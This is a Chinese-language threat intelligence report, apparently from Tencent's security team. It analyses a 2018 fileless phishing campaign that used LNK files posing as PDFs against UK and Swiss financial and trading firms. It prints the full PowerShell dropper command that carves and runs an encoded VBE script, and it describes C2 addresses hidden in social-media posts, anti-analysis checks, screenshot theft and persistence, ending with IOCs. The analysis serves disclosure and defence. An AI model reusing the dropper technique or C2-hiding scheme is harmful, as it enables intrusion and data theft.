产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
2018-12-14 01:33:59
一、概述
近日,腾讯御见威胁情报中心在日常的恶意文件运营中,发现了几个可疑的钓鱼lnk(伪装成快捷方式文件的攻击程序)。经过分析发现,这些lnk构造巧妙,全程无PE文件落地(Fileless攻击),并且把解密key和C2存放在了twitter、youtube等社交站点上。
从关联到的样本来看,攻击针对英国、瑞士等欧洲国家,攻击目标为外贸、金融相关企业。暂时还不详具体的攻击者背景,望安全社区同仁一起来完善攻击的拼图。
该APT组织攻击手法的一些特点:
- 诱饵文件为压缩包中伪装成PDF文档的LNK文件(LNK默认是快捷方式,恶意程序执行后会打开一个欺骗性的PDF文件,这个组合极有欺骗性);
- 攻击过程中,全程无PE文件落地,巧妙避开安全软件的常规检测;
- 攻击程序会判断电脑是否安装网络嗅探工具(wireshark和Nmap,通常为安全研究人员用于网络抓包分析),如果有,就不执行木马核心功能;
- 通过youtube、twitter、Google、wordpress.com的公共空间更新C2,存放解密代码;
- 收集目标计算机名、杀毒软件信息、系统安全时间、系统版本等情报,定时截屏上传;
- 检测是否存在虚拟机等特殊软件。
二、技术分析
1、 攻击诱饵
本次攻击的诱饵是一个zip压缩包,名字为:Dubai_Lawyers_update_2018.zip,压缩报里包含2个lnk文件:
而lnk为攻击者精心构造的恶意lnk,点击运行lnk后,会触发执行包含的恶意代码:
其中,压缩包里的两个lnk的内容类似,我们以其中一个为例进行详细分析。
2、 lnk分析
运行lnk后,执行的恶意代码如下:
Cmd.exe "/c powershell -c "$m='A_Dhabi.pdf.lnk';$t=[environment]::getenvironmentvariable('tmp');cp $m $t\$m;$z=$t+'\'+@(gci -name $t $m -rec)[0];$a=gc $z|out-string;$q=$a[($a.length-2340)..$a.length];[io.file]::WriteAllbytes($t+'\.vbe',$q);CsCrIpT $t'\.vbe'"
该命令的主要功能为:
将dubai.pdf.lnk文件复制到”%temp%”目录;
将lnk文件结尾处往回2340字节的内容,写入“%temp%\.vbe“文件中;
利用cscript.exe将vbe给执行起来。
写入的.vbe文件为使用Encoded加密的脚本文件:
解密后内容如下:
3、 Vbe脚本分析
先将lnk文件从文件头开始,偏移为2334,大小为136848字节的内容写入“A_Dhabi.pdf”,该文件保存在temp目录,而该文件确实为一个pdf文件。接着打开该pdf文件,让受害者误以为只是简单得打开了一个正常的pdf文件而已:
打开的pdf文件如下:
接着将lnk文件中pdf文件之后的338459字节的内容,写入“%temp%\~.tmpF292.ps1”文件中,该文件为powershell脚本:
最后将接下来的读取位置写入”%temp%\~.tmpF293”文件中,并利用powershell将“~.tmpF292.ps1”文件给执行起来:
4、 ~.tmpF292.ps1分析
原始的ps1脚本是经过加密后的脚本:
经过解密后,发现两个特殊的明文字符串:
“Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industrys standard dummy text ever since the 1500s”
和
“when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries but also the leap into electronic typesetting remaining essentially unchanged.”
这两个字符串没有参与加密代码的计算,基本上没有任何意义。而使用搜索引擎搜索该字符后发现,该字符串是为了排版测试的:
加密的代码经过解密,代码逻辑就十分清晰了:
其中, $code = @"到"@部分为powershell里调用的c#方法,后面为powershell脚本命令。
该powershell脚本的主要功能为:
1) 使用WMI,检测安全软件,包括AVG、AVAST,若存在,则删除中间文件,然后退出;
2) 判断是否有wireshark和Nmap,若存在,则不执行木马核心功能;
3) 从~.tmpF293”文件中获取文件偏移,然后从lnk文件中读取信息,然后存入“%temp%\ ~.tmpF291”目录中,涉及到的文件名有~.tmpF222.tmp、~.tmpF295.ico、~.tmpF299.vbe;
4) 继续会从lnk中读取第二阶段的payload,并利用网上获取到的key对payload进行解密并执行。若网络不通未拿到key,就将第二阶段的payload以加密状态存储在“%temp%\ ~.tmp.e”文件中;
5) 如果“%temp%\ ~.tmp.e”文件存在,会利用从网络上获取的key去解密此文件,得到第二阶段的payload文件“~.tmpF294.ps1”,并执行此文件。
6) 获取解密key的url,存储在tmpF222.tmp文件中:
获取到url如下:
https://youtu.be/40rHiF75z5o https://brady4th.wordpress.com/2018/11/15/opener/ https://twitter.com/Fancy65716779
https://plus.google.com/u/0/collection/U84ZPF
然后,从这些url中获取相应的解密代码,其中:
“Yo bro i sing”字符串开始的位置为stage2 payload的c2;
“My keyboard doesnt work”开始的字符串为解密key
从文章的发表时间,我们猜测,真正的攻击开始时间发生在11月15日和11月18日。
7) 持久性攻击:在startup目录创建快捷方式,快捷方式会cscript.exe将“~.tmpF291“目录 中的” ~.tmpF299.vbe“文件给执行起来,快捷方式图标为” ~.tmpF295.ico“
“~.tmpF299.vbe”解密后内容如下:
5、 Stage2(~.tmpF294.ps1)分析
~.tmpF294.ps1为stage2的脚本文件,同样经过了加密,解密后可以发现与真正的c2通信等功能都在此ps脚本中。
1) 使用WMI命令收集相关计算机信息,然后以json格式发送给C2:
收集的内容包括计算机名、机器名、杀软信息、系统安装时间、系统版本等。
格式中还包含“ace”、“dama”、“king”、“joker”等字样。
2) 检测虚拟机等特殊软件:
3) 检测wireshark、winpcap、Nmap等特定软件是否安装
4) 从twitter、youtube、google、wordpress等网站更新C2:
5) 定时截屏并发送:
6) 执行C2下发的powershell脚本:
7) 隐藏“%temp%\~.tmpF291”目录,特殊的存储路径“AA36ED3F6A22”为ip存储路径、“E4DAFF315DFA”域名存储路径、“~.tmpF297.tmp”为c2下发的序列号存储路径。
8) 根据服务器指定修改定时截屏时的画面质量及频率:
三、关联分析
1、 样本拓线:
经过C2的反查,我们又查到找其余几个相同的样本:
Confirm.pdf.lnk,d83f933b2a6c307e17438749eda29f02
Gift-18.pdf.lnk,6f965640bc609f9c5b7fea181a2a83ca
而这两个lnk同样来自于一个zip压缩包:Gift-18.zip
经分析,这两个lnk跟分析的lnk为同一个攻击。
而压缩包中还包含了一张图片:
释放的pdf如下:
继续关联,我们又发现了另外2个lnk:
ecamos_Volatility_Strategy_2X.pdf.lnk:540bc05130424301a8f0543e0240df1d
p2_ecamos_Volatility_Strategy_2X.pdf.lnk:38b777dfd5f153609ad6ff8cff1bdedc
运行后,pdf内容如下:
我们猜测,该次攻击对象为瑞士的金融机构和贸易公司。
该lnk获取解密key的url为:
https://twitter.com/sabinepfeffer69/status/928607342177988608
https://mads281.wordpress.com
https://www.youtube.com/watch?v=ZRQ-1I856XA
跟上述分析的一致。
2、 攻击中的相关元素
1) 攻击的某个诱饵pdf来自于英国政府网站:https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/754075/Dubai_List_of_Lawyers_-_Nov_2018.pdf
2) 某个诱饵pdf里的图片里的公司的信息:
该图片来自:http://i68.tinypic.com/jtntyd.jpg
3) 存放解密信息的博客https://brady4th.wordpress.com中的第一条信息,引用了一句名人的话:
Izaak Walton为一个英国的作家
4) youtube中的电影
该电影为一个法国电影,被称为世界上第一部恐怖电影。
5) 此外还有不少字符串信息,如dubuk7、dama、Ashley Brady、brady4th、Fancy65716779、Pansy Radon、sabinepfeffer69、mads281、The Obsidian Cloud Casino v1.0等。不过并未搜索和关联到更多的信息。
3、 攻击背景
从攻击对象来看,主要是英国、瑞士的相关外贸机构和金融机构。而攻击者角度来看,作者并未留下太多可追溯的确切证据。而从使用lnk钓鱼、fileless攻击的组织来看,似乎APT29更接近,不过暂未发现任何证据指向该组织。因此我们也希望更多安全社区同仁一起合作,来完善该次攻击的拼图。
四、安全建议
1. 不要打开不明来源的邮件附件;
2. 及时打系统补丁和重要软件的补丁;
3. 使用杀毒软件防御可能的病毒木马攻击;
4. 使用腾讯御界高级威胁检测系统。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
五、附录(IOCs)
MD5:
e1718289718792651fa401c945c17079
3b359a0e279c4e8c5b781e0518320b46
6f965640bc609f9c5b7fea181a2a83ca
d83f933b2a6c307e17438749eda29f02
540bc05130424301a8f0543e0240df1d
38b777dfd5f153609ad6ff8cff1bdedc
IP
54.38.192.174
url:
https://youtu.be/40rHiF75z5o
https://brady4th.wordpress.com/2018/11/15/opener/
https://twitter.com/Fancy65716779
https://plus.google.com/u/0/collection/U84ZPF
https://twitter.com/sabinepfeffer69/status/928607342177988608
https://mads281.wordpress.com
https://www.youtube.com/watch?v=ZRQ-1I856XA
在线咨询
方案定制